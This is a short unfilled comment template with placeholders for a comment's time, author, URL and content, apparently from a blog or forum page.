{commenttime}{commentauthor}
{CommentUrl}
{commentcontent}